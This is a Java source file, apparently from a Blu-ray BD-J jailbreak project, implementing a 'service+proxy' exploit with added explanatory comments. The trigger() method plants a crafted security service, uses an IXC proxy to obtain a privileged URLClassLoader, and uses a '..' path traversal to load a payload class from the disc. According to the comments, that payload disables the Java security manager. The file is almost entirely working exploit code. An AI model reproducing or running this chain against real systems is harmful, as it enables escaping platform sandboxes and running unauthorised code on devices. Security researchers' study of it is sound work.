/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.Provider;
import java.security.Security;
/** Implementation of the service+proxy exploit. */
/**
 * Implementation of the service+proxy exploit.
 *
 * <p>What {@link #trigger()} does, step by step as written in this file: it checks that
 * {@link #SERVICE_CLASS_NAME} is present, builds a {@code ServiceImpl} that names
 * {@link URLClassLoader} as the class to instantiate and registers it on the first installed
 * security {@link Provider} through {@code ProviderAccessorImpl}, has {@code IxcProxyImpl} call
 * {@code newInstance(Object)} on that service with {@link #JAR_URL} as the loader's only search
 * URL, and finally loads and instantiates {@link #PAYLOAD_CLASS_NAME} through the resulting
 * loader. The author's comments below state that the loader ends up privileged and that the
 * payload disables the security manager; neither effect is visible in this file, both happen in
 * the collaborating classes and in the payload JAR.
 *
 * <p>The file uses no generics and calls {@code Class.newInstance()}, which suggests a pre-Java 5
 * language profile; confirm before applying newer idioms to it.
 */
class ExploitServiceProxyImpl implements ExploitInterface {
  // Existence of this class is the only precondition trigger() checks explicitly.
  private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";

  // Name and JVM descriptor of the method invoked through the IXC proxy: one Object parameter,
  // Object return value.
  private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
  private static final String NEW_INSTANCE_METHOD_SIGNATURE =
      "(Ljava/lang/Object;)Ljava/lang/Object;";

  // file: URL whose path climbs out of /app0/bdjstack/lib/ext with ".." segments to the disc's
  // JAR directory. Kept verbatim: the traversal is part of the chain (see trigger()).
  private static final String JAR_URL =
      "file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";

  // Class loaded from JAR_URL and instantiated as the last step.
  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";

  /**
   * Runs the chain described on the class.
   *
   * <p>Beyond the class-existence check nothing is validated: {@code Security.getProviders()} is
   * assumed to return at least one provider (index 0 is used unchecked) and the proxied call's
   * result is cast to {@link URLClassLoader} without an {@code instanceof} test.
   *
   * @throws Exception any failure along the chain: {@link ClassNotFoundException} from the
   *     existence check or the payload load, {@link java.net.MalformedURLException} from building
   *     the URL, whatever {@code IxcProxyImpl.invokeMethod} propagates, {@link ClassCastException}
   *     if the proxied call returns something other than a {@link URLClassLoader}, or
   *     {@link InstantiationException}/{@link IllegalAccessException} from
   *     {@code Class.newInstance()}
   */
  public void trigger() throws Exception {
    // Throw exception if class does not exist.
    Class.forName(SERVICE_CLASS_NAME);

    IxcProxyImpl proxy = IxcProxyImpl.getInstance();

    // Prepare service object with the class to be instantiated. The two "exploit" strings are
    // presumably the service type and algorithm, the fourth argument is the class the service
    // will construct; confirm against ServiceImpl's constructor.
    Provider[] providers = Security.getProviders();
    ServiceImpl service =
        new ServiceImpl(
            providers[0], "exploit", "exploit", URLClassLoader.class.getName(), null, null);
    ProviderAccessorImpl providerAccessor = new ProviderAccessorImpl(providers);
    // Order kept as written: the service is registered first, then the accessor is installed.
    providerAccessor.putService(providers[0], service);
    providerAccessor.setProviderAccessor();

    // Instantiate the URLClassLoader class with privileges and a vulnerable path.
    // The single-element URL array is the one Object argument NEW_INSTANCE_METHOD_SIGNATURE
    // declares; it becomes the loader's search path.
    URL[] urls = new URL[] {new URL(JAR_URL)};
    URLClassLoader urlClassLoader =
        (URLClassLoader)
            proxy.invokeMethod(
                service,
                NEW_INSTANCE_METHOD_NAME,
                NEW_INSTANCE_METHOD_SIGNATURE,
                new Object[] {urls});

    // Instantiate the payload class with all permissions to disable the security manager.
    // Raw Class and Class.newInstance(): see the class comment on the language profile.
    Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
    payloadClass.newInstance();
  }
}